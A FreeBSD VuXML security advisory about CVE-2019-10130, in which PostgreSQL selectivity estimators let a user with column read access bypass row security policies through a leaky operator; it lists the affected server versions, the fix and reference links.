FreeBSD VuXML: Documenting security issues in FreeBSD and the FreeBSD Ports Collection

PostgreSQL -- Selectivity estimators bypass row security policies

Affected packages
postgresql11-server < 11.3
postgresql10-server < 10.8
postgresql96-server < 9.6.13
postgresql95-server < 9.5.17

Details

VuXML ID 065890c3-725e-11e9-b0e1-6cc21735f730
Discovery 2019-05-09
Entry 2019-05-09

The PostgreSQL project reports:

PostgreSQL maintains statistics for tables by sampling data available in columns; this data is consulted during the query planning process. Prior to this release, a user able to execute SQL queries with permissions to read a given column could craft a leaky operator that could read whatever data had been sampled from that column. If this happened to include values from rows that the user is forbidden to see by a row security policy, the user could effectively bypass the policy. This is fixed by only allowing a non-leakproof operator to use this data if there are no relevant row security policies for the table.

References

CVE Name CVE-2019-10130
URL https://www.postgresql.org/about/news/1939/